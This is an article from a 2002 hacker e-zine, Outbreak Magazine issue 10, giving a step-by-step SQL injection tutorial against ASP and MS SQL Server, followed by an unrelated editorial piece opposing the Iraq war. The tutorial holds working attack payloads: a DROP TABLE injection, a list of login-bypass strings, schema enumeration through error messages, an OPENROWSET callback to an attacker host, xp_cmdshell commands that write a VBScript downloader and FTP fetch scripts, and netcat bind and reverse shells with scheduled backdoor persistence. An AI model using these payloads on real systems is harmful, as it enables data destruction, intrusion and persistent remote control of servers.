           ßÛ ÛÛß  °ÛÛÛ   ßÛÛÜ°ÛßÛÛÛÛß±Û    °ÛÛÛß°ÛÜÜÛ²°Û    °Û
              Outbreak Magazine Issue #10 - Article 17 of 18
           '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'


######################################################################
###............   SQL Injection: Theory and Practice   ............###
######################################################################

Intro.
----------------------------------------------------------------------
Recently,  I  was  hired  by an information security firm to code some
backend  SQL  handlers in ASP. I know what you're thinking, a security
company with an IIS based webserver? This is why I'll keep the name to
myself.

When  writing backend applications for a professional web developement
project,  its  really  important  to  check and double check your code 
for  potential  weaknesses.  So,  when  I  was  finished  writing  the 
handlers,  comparing  them to my flowcharts and running  them  through
a few standard test procedures, I began an indepth security audit.

It  was  then  that  I  realized  the  truly  hazardous potential weak 
ASP/SQL   code  could  have  on  sensitive  information  stored  in  a 
database.  Understand that this type of attack is by no means anything 
new,  but after scouring the web for information on this type of vuln-
erability I still believe there is alot of uncharted territory.

   NOTE: The vulnerabilities explored in this text are NOT specific to
         weak  ASP  code and are NOT reflective of any weakness of the 
         SQL  language  itself.  The  vulnerabilities can exist in ANY 
         serverside  program  interacting  with  an SQL server ie ASP, 
         PHP,   CGI,  etc.  All  examples  presented  here  deal  with 
         ASP,  however,  the same  vulnerabilities can be exploited on 
         programs  written  in other languages using variations of the 
         same methods.

Basic SQL.
----------------------------------------------------------------------
To  start,  I'll  build  a  simple,  psuedo  database.  We'll  call it 
"Access Card Usage LOG":

                      Table:Log093002
                     -------------------
   .----.---------.---------.---------.---------.---------.
   | ID | Date    | Time    | LName   | FName   | Door    |
   |----|---------|---------|---------|---------|---------|
   | 12 | 9/30/02 | 6:26    | Smith   | Tom     | Front   |
   | 31 | 9/30/02 | 6:26    | Baily   | Dick    | Front   |
   | 84 | 9/30/02 | 6:41    | Hoover  | Harry   | Side    |
   '----'---------'---------'---------'---------'---------'

Assume the above to be an actual buildings access card useage log. Not
because  its  important  to  the file, because... Its cool. Next we'll
discuss the basics of SQL.

For  the purpose of this file, SQL is a language used to interact with
databases.  The  language  consists of a set of statements that can be
used  together  in a logical series to create a query. SQL queries are
used  to  read  data  from and manipulate the structure or contents of 
databases and is very similar to standard english.

The following is an example of an SQL query to our database.

   SELECT ID, LName, Time FROM Log093002

The  above  could  be  used  to  determine  whether  or not anyone had 
arrived  late  on  the  date  in  question (9/30/02). That query would
return the following:

   .----.---------.---------.
   | 12 | Smith   | 6:26    |       Scheduled arrival time for 9/30/02 
   | 31 | Baily   | 6:26    |       is  6:30. Bad news for mr. Hoover.
   | 84 | Hoover  | 6:41    |       *smirk*
   '----'---------'---------'

What  if  we  only wanted to know the arrival time of Harry Hoover? We 
can  aquire  that  data  using  the  WHERE clause, we will assume that 
the ID field specifies each employees unique Employee Code.

   SELECT ID, LName, Time FROM Log093002 WHERE ID = '84'

   .----.---------.---------.
   | 84 | Hoover  | 6:41    |
   '----'---------'---------'

The  SQL  language also makes use of AND, OR, NOT, etc operators along
with  a  lot  of  other  statements  that I've left out here. For more
information on SQL, I suggest reading the tutorials at w3schools.com.


Weaknesses.
----------------------------------------------------------------------

Imagine  a  database  containing  a list of names, addresses and phone 
numbers similar to the type of database they must be using for 411 and 
double-o  info  type  services online (ie switchboard.com). There is a 
form  on their homepage where a user is able to enter various types of
information  that  is  then  run through an asp handler that grabs and 
displays matching entries from the database.

Here is a snippit from the database:

   .--------------.--------------.-------------------.--------------.
   | LastName     | FirstName    | Address           | PNum         |
   | ...          | ...          | ...               | ...          |
   | Sanders      | Bill         | Someplace  PA     | 612-555-1253 |
   | Borsche      | Sveda        | Nowhere    MS     | 710-555-1212 |
   | ...          | ...          | ...               | ...          |
   '--------------'--------------'-------------------'--------------'

Here is an example of the form:

   <form id="Lookup" method="post" action="Lookup.asp">
      <input id="FirstName" type="text" />
      <input id="LastName"  type="text" />
      <input id="Address"   type="text" />
      <input id="PNum"      type="text" />
      <input id="Submit"    type="submit" value="Submit" />
   </form>

You  would  enter  what  ever  data  you  have  and  click submit. The 
variables  would  then be passed to Lookup.asp. This is where the main
weakness  lies. Lookup.asp's main function is to generate an SQL query
based  on  the users input, and use it to grab data from the database.
The  following  is an example of a weak implementation of this type of
SQL query, here the user entered ONLY the phone number and the omitted
asp code generated the following query:

   sqlQuery = "SELECT * FROM 411db WHERE PNum = '" & PNum & "';       

If the number entered by the user was 710-555-1212, then the above 
variable would translate to this:

   SELECT * FROM 411db WHERE PNum = '710-555-1212'

And, after querying the database, would return:

   .--------------.--------------.-------------------.--------------.
   | Borsche      | Sveda        | Nowhere    MS     | 710-555-1212 |
   '--------------'--------------'-------------------'--------------'

   NOTE: the asterisk (*) between the SELECT and FROM statements is an
         SQL wildcard. Just as in Dos, Unix, etc, it means 'all'.

That  is  the  logical  process.  Its what the developers designed the 
system  to  do,  and  it  does  it  well. But what happens when we try 
something  a  little  less  logical?  This time, instead of entering a
standard ten digit phonenumber... we'll enter a less standard NO digit
phone number. A standard single quote. Namely: '

In this case, Lookup.asp would generate the following SQL query:

   SELECT * FROM 411db WHERE PNum = '''

If  Lookup.asp  is vulnerable (which, in our case, it is) we would get 
a  syntax  error. In SQL every opening quote requires a closing quote.
The  quote  we  entered  in  the PNum input box effectively closes the 
first  quote  generated  by  Lookup.asp,  but  the  last  quote  (also 
generated by Lookup.asp) is left unclosed.
                                    
It  is  possible  for  us  to avoid this error by using an SQL comment 
sequence  (--).  Adding  this  sequence to an SQL query will cause the 
SQL  interpreter  to  ignore anything following the --. so, instead of
entering  a  single  quote  into  the PNum field, we'll enter a single
quote  followed  by  a comment sequence ('--) generating the following
query:

   SELECT * FROM 411db WHERE PNum = ''--'

The  SQL  interpreter  would  then  remove  the  comment  sequence and 
anything following it before processing the request:

   SELECT * FROM 411db WHERE PNum = ''

   NOTE: the  dash  dash  (--)  comment sequence is specific to MS SQL 
         server.  If  the  dash dash comment sequence doesn't work for
         you  try  a  hash (#) as the comment character. If that still
         wont  work,  take  a  look  at  the  next  NOTE  for  another 
         possibility.  All  the  examples  shown  in this text will be 
         using the -- comment sequence.

Hold  on a sec... What did we just do? We got rid of the closing quote 
that Lookup.asp was supposed to end the query with, and added our own!
Yay!  We've  effectively  injected  completely  trivial,  useless code 
through an html form!

Oh  wow.  How  dangerous.  The query we just generated is exactly what 
would  have  been  generated had we submitted a completely blank form.
(of course, if we entered a completely blank form, Lookup.asp may have
noticed  and  complained if it was written with a mechanism to do so).
The  truly  frightening  part  is  the possiblities that arise when we 
begin injecting our own SQL queries.

An  important  thing  to  note  is  that  different SQLs use different
delimiting characters. In the following examples we'll use a semicolon
delimiter. Incase you don't know, a delimiter is a character within an
SQL query (and many other languages) that determines where one command
ends and another begins.

Lets  add to our single quote double dash ('--) input. This time We'll 
place a query between the ' and the -- ie: '; DROP TABLE 411db--

   SELECT * FROM 411db WHERE PNum = ''; DROP TABLE 411db --'

Comments removed:

   SELECT * FROM 411db WHERE PNum = ''; DROP TABLE 411db

In  this  query  we  used  the  DROP  TABLE statement. This particular 
SQL command will completely delete a table from a database. Our single
quote acted as a closing quote to lookup.asp's opening quote, followed
by  our  semicolon (;) effectively ending that first query. DROP TABLE
411db  acted  as  a second query, completely independent of the first, 
and finally our -- eliminated Lookup.asp's final closing quote.

In effect, useing '; DROP TABLE 411db-- as our entry caused Lookup.asp
to completely delete the 411db table.

The  above example was just a taste of the true potential this exploit
really  has.  Lets take a look at another database:

            Table:userlist
           ----------------
   .-----.------------.------------.
   | UID | Username   | Password   |
   |-----|------------|------------|
   | 10  | john       | love       |
   | 10  | bill       | sex        |
   | 5   | dan        | secret     |
   | 0   | root       | god        |
   '-----'------------'------------'

Now  we're getting somewhere. This database is aslo accessed via a web
form. Lets have a look at that as well:

   <form id="auth" method="post" action="auth.asp">
      <input id="username" type="text">
      <input id="password" type="password">
      <input id="submit" type="submit" value="submit">
   </form>

And somewhere within auth.asp, a variable is loaded with an SQL query:
   
   sql = "SELECT * FROM userlist WHERE Username = '" & username & "'
                                  AND Password = '" & password & "'" 

auth.asp  processes the request and the result is tested to see if the
name and password entered match any from the list. Lets take a look at
a translation of a logical interaction:

   SELECT * FROM userlist WHERE Username='john' AND Password='love'

This request would return:

   .-----.------------.------------.
   | 10  | john       | love       |
   '-----'------------'------------'

And  auth.asp would go about logging john into the system. Now this is 
where the true beauty of this vulnerability shows through. We'll start
by testing auth.asp to see if its vulnerable. If using quote as one of
your  inputs  generates  an  SQL  syntax  error, its generally safe to 
assume  that  the  asp  is  vulnerable. If the developer was smart, he 
would  have  filtered  out  quotes.  So  we pass a single quote (') to 
auth.asp  as  the username and the server returns a syntax error. Yay,
weak code.

Now  that  we  know  that  auth.asp  is  exploitable,  there  are  any 
number  of  ways  we  can  use  the  SQL  Injection  technique  to our 
advandage.  For  instance,  in the following example I'll inject an OR 
operator with a true condition to our SQL query. 

Here I'm submitting root as my login and ' OR 0=0-- as my password:

   SELECT * FROM userlist WHERE Username = 'root' AND 
                              Password = '' OR 0=0--'

And with the comments removed:

   SELECT * FROM userlist WHERE Username = 'root' AND
                                 Password = '' OR 0=0

Originally,  auth.asp  would  ONLY log you in if your Password matched
the  stored  Password  for  your Username. But with our injected code, 
auth.asp  will  log  you  in  if  your  Password  matches  the  stored
Password  for your Username OR if 0 is equal to 0, which it always is.

   NOTE: As stated in the last NOTE theres a chance that the dash dash
         (--)  comment  sequence  wont  work. In the case of the above 
         query  theres  another  possibility. The statement 0=0 has no 
         function other than to act as a true condition. we could have
         just  as  easily  said  1=1  or  9999=9999,  so  long  as the 
         condition  we're stating is true. Knowing this along with the 
         fact that auth.asp is adding a single quote (') to the end of
         our query, we can submit a statement like: ' OR 'x' = 'x
         which would generate: 

            SELECT * FROM userlist WHERE Username = 'root' AND 
                                    Password = '' OR 'x' = 'x'

         Making  use  of  the  quote we couldn't eliminate :) Its also 
         important  to  know  that not ALL queries have the exact same
         syntax,  amount  of  parameters, types of parameters, etc and 
         that  in  some  circumstances  you  may  have to use a double 
         quote  (")  in  place of a single quote. Here some variations
         to try:
         
            ' or 0=0 --
            " or 0=0 --
            or 0=0 --
            ' or 0=0 #
            " or 0=0 #
            or 0=0 #
            ' or 'x'='x
            " or "x"="x
            ') or ('x'='x
            
         It  may  look  daunting, but its quite simple to grasp if you 
         try.  I  would suggest trying to understand before you ctrl-c
         ctrl-v the crap out of someone.
         
Maybe  we  want  to  build ourselves a root account... We could simply
inject ';  INSERT INTO USERS values( 0, Dade, zeroco0l )-- causing the
following query to be submitted:

   SELECT * FROM userlist WHERE Username = ''; INSERT INTO USERS
                                     values( 0, Dade, zeroco0l )

There.  Two  completely  independent  queries, the latter adding a new 
account  to  the  database.  Wait a second... I see a problem here. In
order  for us to add an account, we would have to know previously that 
the  table  consists of three columns. Additionally, we'd need to know
What data to store in which column.

By  default,  ASP returns detailed descriptions of all errors. This is 
very  fortunate  because  some of the details listed in the errors can
potentially  leak  information  pertaining  to the structure of tables 
within  the  target database. We'll make use of the ASP error messages
as  an  enumeration technique to map out the userlist table.

   SELECT * FROM userlist WHERE Username = '' HAVING 0=0

Passing  auth.asp  the above query (using ' HAVING 0=0-- as our input)
would  cause  the  program  to  error  out and often display the error
report  to  the  user.  The reason that query errors out is because of
the  way we used the HAVING clause. HAVING is supposed to be used on a
table  column  thats  been called and sorted with the GROUP BY clause.
In  our  case,  no  columns  were sorted using GROUP BY and because we
use  the  *  wildcard  to  grab  ALL the columns, we'd get an error on 
the  first  column  called which is the first column in the table. The
neat  thing  is  that  the error report contains the name of the table
AND the name of the column that caused the error :).

   Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
   
   [Microsoft] [ODBC SQL Server Driver] [SQL Server] Column 
   'userlist.UID' is invalid in the select list because it is not
   contained in an aggregate function and there is no GROUP BY 
   clause.

   /auth.asp, line 28

From the above error report we have determined that the tables name is
userlist and the first column in the table is called UID. I've already
explained  above,  but I'll try one more time for anyone who's lost at 
this  point.  'SELECT * FROM userlist' grabs every column in the table
'userlist'  one  by  one.  We  use  the  HAVING  clause incorrectly to 
purposely  generate a syntax error. Because HAVING looks at the column
in  question,  which  in  our  case  is the FIRST column, the error is
generated ON that column and the server bitches, 'hey asshole, I tried
doing  what  you  asked, but the first column isn't sorted and I can't
use  HAVING  on  an unsorted column. I'll just wait here till you sort 
the column with GROUP BY.'

Lets take another step. We'll try the same thing, only this time we'll
use  the GROUP BY clause to sort the first column. The SQL server will
have  no  trouble using the HAVING clause on that first, sorted column
but  immediately  afterwards,  it  will try using HAVING on the second 
column  (because we're using *)  and  since  the  second  column isn't 
sorted, we'll error out there.

   SELECT * FROM userlist WHERE Username = '' GROUP BY 
                               userlist.UID HAVING 0=0

userlist.UID  passes  the  HAVING  test  fine,  but  the second column
causes the following error:

   Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
   
   [Microsoft] [ODBC SQL Server Driver] [SQL Server] Column 
   'userlist.Username' is invalid in the select list because 
   it is not contained in either an aggregate function or the
   GROUP BY clause.

   /auth.asp, line 28
   
We  can  continue this method and eventually map out the entire table. 
Once  we  have  the  entire table we'll know exactly how to format our 
input  to  add  records  to the table. For instance, after mapping out 
the  userlist table, we'd know the columns are UID, Username, Password
and  could  then  add  our  own  login  to  the table with the correct 
criteria.  Just  to  keep you up to pace, heres what the last query of
our mapping procedure would look like:

   SELECT * FROM userlist WHERE Username = '' GROUP BY userlist.UID,
                     userlist.Username, userlist.Password HAVING 0=0

Here, all the columns in the table have been sorted and the query wont
error out. :)

There  are  other  important things that can be gleaned from sql error 
messages.  Lets  take  a look at the UNION statement. UNION is used to 
merge  the  results  of two separate queries. It is required that both
queries have matching datatypes. For instance:

   SELECT age FROM boys UNION SELECT age FROM girls;

Note that in this example both age in boys and age in girls are of the 
type 'integer'. But what would happen if we were to attempt to merge a 
string  to  an  integer?  Lets see. In userlist we have 3 columns, the 
first  being  an  integer,  the following two being strings. Lets pair
up  the  first integer in userlist (UID) with a string using the UNION
statement and see how it errors out:

   SELECT * FROM userlist WHERE Username = '' UNION 'wo0t', 'x', 'x'

Here we've paired the integer 10 in userlist's column UID with the 
string 'wo0t'. This will produce the following error:

   Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
   
   [Microsoft] [ODBC SQL Server Driver] [SQL Server] Syntax error 
   converting the char value 'wo0t' to a column of data type int.

   /auth.asp, line 28

boohaw.  SQL  has reported the actual contents of the string we passed 
it  ('wo0t').  This is a good way to pull a bit more info from the SQL 
server.  For  instance,  SQL  server  comes  equipped  with a built in 
constant  called  @@version.  Stored within @@version is some detailed
information  about  the  version,  build,  release  of  the sql server 
running and the platform it is running on.

Lets submit the same type of query, but this time we'll pair the 
integer column UID with the string constant @@version:

   Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
   
   [Microsoft] [ODBC SQL Server Driver] [SQL Server] Syntax error 
   converting the char value 'Microsoft SQL Server 2000 - 8.00.194
   (Intel X86) Aug 6 2000 00:57:48 Copyright 1988-2000 Microsoft
   Corporation Enterprise Edition on Windows 2000 2.0 (Build 6132:
   Service Pack 3) ' to a column of data type int.

   /auth.asp, line 28

*nods*  interesting. Unlike  most  compile  and  run or copy and paste 
exploits,   SQL   Injection  requires  a  little  bit  of  cleverness, 
so  for  anyone  interested,  there's  a  list  of  @@  constants  at: 
http://www.ddart.net/mssql/sql2000/html/  maybe  you'll find something
to do with them that I havn't :)

Now,  in an attempt to thwart these types of attacks, a savvy sysadmin 
can  configure his sql server to not display these errors to the user.
On  top  of  that, there are plenty of other ways an administrator can 
stop  potential  attackers  by making it difficult for them to see the
results  of their queries. All of a sudden things look a little bleak.
Never fear, theres more :)

If  you  can't see error messages, and theres nothing in the .asp that
you  can force to display your queries results in the browser, how can
you do anything? Its like hacking blind. Well, Theres an SQL statement
suited  to this problem. OPENROWSET is a component of SQL that has the 
ability  to  grab  data  from/pass  data  too  remote databases. Using 
OPENROWSET  its possible to do plenty of fun things. For instance lets
say  the attacker has SQL Server running on his system. He queries the 
sql  server he's attacking and recieves no error msg... So how does he
know  its  even vulnerable? he can use OPENROWSET in his query to have 
the  victim  sql server attempt to pull data from HIS sql server. He'd 
notice  the  inbound connection on his system and, therefore know that
hes executing queries on the target server :)

He would do that with the following injection:

   SELECT * FROM userlist WHERE Username = ''; SELECT * FROM 
           OPENROWSET('SQLoledb', uid=username; pwd=password
           network=DBMSSOCN;address=0.0.0.0,31337;', 'SELECT
           * FROM userlist')

As  you know, the first query is created by auth.asp and not important
to  us  in  anyway.  we've  successfully  injected  the  second query, 
beginning  with  the  second  SELECT  statement.  This will connect to 
a  remote  SQL  server running on port 31337 of 0.0.0.0 (of course the
attacker  would  change  these  to the ip,port that his sql server was 
running  on. The attacker would then watch with his firewall or packet
logging software or what have you for the inbound connection.

Now  it  is,  of  course,  possible that the system the target servers 
running  on  is behind a firewall. If the firewall wont allow outbound 
connections  to  port  31337 then the above attack wouldn't work. This
is  not  necessarily  a  bad thing though... We can use this behaviour
to determine the firewalls rulesets :) Try various ports and determine
which  ones  we  can  initiate  outbound  connections through. This is 
particularly  useful  when  we  come  to realize that the SQL language
comes  equipped  with  the  ability to upload and execute files on the 
server. 

This  can be accomplished using the xp_cmdshell procedure. xp_cmdshell
is  basically  an SQL command that will spawn a command shell and pass
arguments  to it. Anyone thats used DOS extensively can probably think
of  plenty of fun things to do with this procedure. For instance, lets
use  the  dos command ECHO and the append operator (>>) to construct a
.vbs file on the servers filesystem:

   SELECT * FROM userlist where USERNAME = ''; 
                exec master..xp_cmdshell 'echo 
                code for our .vbs program >> 
                0wn3d.vbs'

As you can see, the syntax for xp_cmdshell is exec master..xp_cmdshell 
'command'.  There are plenty of interesting things we could stuff that 
.vbs  with...  possibly  some  code to fetch files off the web? 

   Set xmlHTTP = CreateObject("MSXML2.ServerXMLHTTP")
   URL= "http://www.domain.com/file.exe"
   xmlHTTP.open "GET", URL, false
   xmlHTTP.send()
   set myStream = CreateObject("ADODB.Stream")
   myStream.Open
   myStream.Type = 1
   myStream.Write xmlHTTP.ResponseBody
   myStream.Position = 0    'Set the stream position to the start
   myXMLfile = "D:\file.zip"
   set FSO = Createobject("Scripting.FileSystemObject")
   if fso.Fileexists(myXMLfile) then Fso.DeleteFile myXMLfile
   set FSO = Nothing
   myStream.SaveToFile myXMLfile
   myStream.Close
   Set myStream = Nothing
	
Or  for  those  who don't know vbscript, you could use the same method 
to  stuff a file with FTP commands and run ftp with the input piped in 
from that file. You would fill up a file with ftp commands like this:

   exec master..xp_cmdshell 'echo open 0.0.0.0 21 >> ftp.dat'
   exec master..xp_cmdshell 'echo username >> ftp.dat'
   exec master..xp_cmdshell 'echo password >> ftp.dat'
   exec master..xp_cmdshell 'echo lcd c:\ >> ftp.dat'
   exec master..xp_cmdshell 'echo binary >> ftp.dat'
   exec master..xp_cmdshell 'echo get path\file.exe >> ftp.dat'

Then finally, you would use the command:

   exec master..xp_cmdshell 'ftp.exe < ftp.dat'

Which would run ftp using all the commands in ftp.dat as its input.

We  could use this technique to upload netcat to the target server and
have  it  hardlisten  to some port acting as a backdoor. we could also
execute  the  AT  command from the command line adding our backdoor to 
the  win2k  scheduling program (assuming win2k is the platform running
and the scheduling service is running.

   exec master..xp_cmdshell 'nc -L -d -e cmd.exe -p 31337'
   exec master..xp_cmdshell 'AT 00:00 /every:M "nc -L -d -e cmd.exe -p
                                                               31337"'

Of  course,  instead  of 31337, you would use a port that you know you
can  connect  to.  Wait,  what  if the firewall is too picky for that?
well,  we  can  get  around this also. Often a firewall will do a damn
good  job keeping packets from getting in... but they don't often make 
to  big  a  deal  of letting packets out. We can initiate a connection 
from inside the firewall like this:

   exec master..xp_cmdshell 'nc -d -e cmd.exe 0.0.0.0 31337'

Replacing  0.0.0.0  with  the  attackers  system, or a system he is in 
control  of  and  having that system listen on port 31337 (or any port 
that the firewall will packets flow out through, remember when we used
openrowset to mine those types of rules from the firewall? hurrah.

You  can  also  use  the  timeout property  of openrowset to turn your 
target into a portscanner. the possibilities are endless. :)


Well,  I'm sure theres a few things I'm missing... but I'm on a bit of
a  tight  schedual  this week... Kleptics waiting on me. If anyone has 
any questions feel free to ask me at dropc0de@yahoo.com. 
----------------------------------------------------------------------

greets: savvyD,  ramb0x,  gr3p,  kleptic,  dirv,  jenny,  lexi, lenny, 
        turb, joja, smiley, again. And this time i'd like to add Kybo,
        Count and Forge. :D


         _______________________________________________________________
        |______________________________________________________________ |
        ||                                                             ||
        ||           ___        _   ____                 _             ||
        ||          / _ \ _   _| |_| __ ) _ __ ___  __ _| | _          ||
        ||         | | | | | | | __|  _ \| '__/ _ \/ _` | |/ /         ||
        ||         | |_| | |_| | |_| |_) | | |  __/ (_| |   <          ||
        ||          \___/ \__,_|\__|____/|_|  \___|\__,_|_|\_\         ||   
        ||                                                             ||
        ||_____--------------------------------------------------______||
        |_______/-----------------------------------------------\_______|
				                                      
                               ___ _           _
                              | __(_)_ _  __ _| |
                              | _|| | ' \/ _` | |
                           __ |_| |_|_||_\__,_|_|
                           \ \    / /__ _ _ __| |___
                            \ \/\/ / _ \ '_/ _` (_-<
                             \_/\_/\___/_| \__,_/__/


                                                                               
        ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ   

		PUT THE WORDS IN HERE:
		
	Hey everyone! Well, here is issue #10. Hope you all enjoyed it.
        I usually write about howe you should send us articles. But this
        Issue I want you to read something written by, Matthew Rothschild.

        ================
        Bush's Obscenity
        ================

        On October 3, Bush uttered one of the grossest obscenities imaginable: 
        "War may be unavoidable."

        War is almost always avoidable.

        In the case of Iraq, it is particularly avoidable, since Iraq has not 
        attacked the United States and is in no position to do so.

        It's only "unavoidable" because Bush so desperately wants to go to war.

        Bush, not Saddam Hussein, is blocking the U.N. inspectors from going 
        back to work.

        And Bush and Blair are insisting that U.N. Security Council let the
        war begin.

        How Bush could then say, with a straight face, that "we didn't ask for 
        this challenge" is beyond me.

        Then, pouring it on, he added, "None of us here today desire to see 
        military conflict because we know the awful nature of war."

        Actually, I doubt Bush has any appreciation of the awful nature of war, 
        and his desire for military conflict against Iraq is on display for all 
        to see.

        These rhetorical feints are mere calisthenics before the heavy lifting 
        of the bombs, a ritual clearing of the throat before the war whoop.

	

             
                              - Outbreak Staff
	
        ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 
        ++++++++++++++++++++++++++WATCH THIS SPACE++++++++++++++++++++++
       ³ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄij
                                +-+-+-+-+-+-+-+-+
 -°°°±±±±±²²²²²ÛÛÛÛÛÛÛÛÛ²²²±±°ð-|O|u|t|b|r|e|a|k|ð°°°±±±±±²²²²²ÛÛÛÛÛÛÛÛÛ²²²±±°-
                                +-+-+-+-+-+-+-+-+
       ³ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄij

      Outbreak Contents may not be used with out express written permission
                        By the Editor - kleptic@grex.org
 
                               COPYRIGHT©® 2002.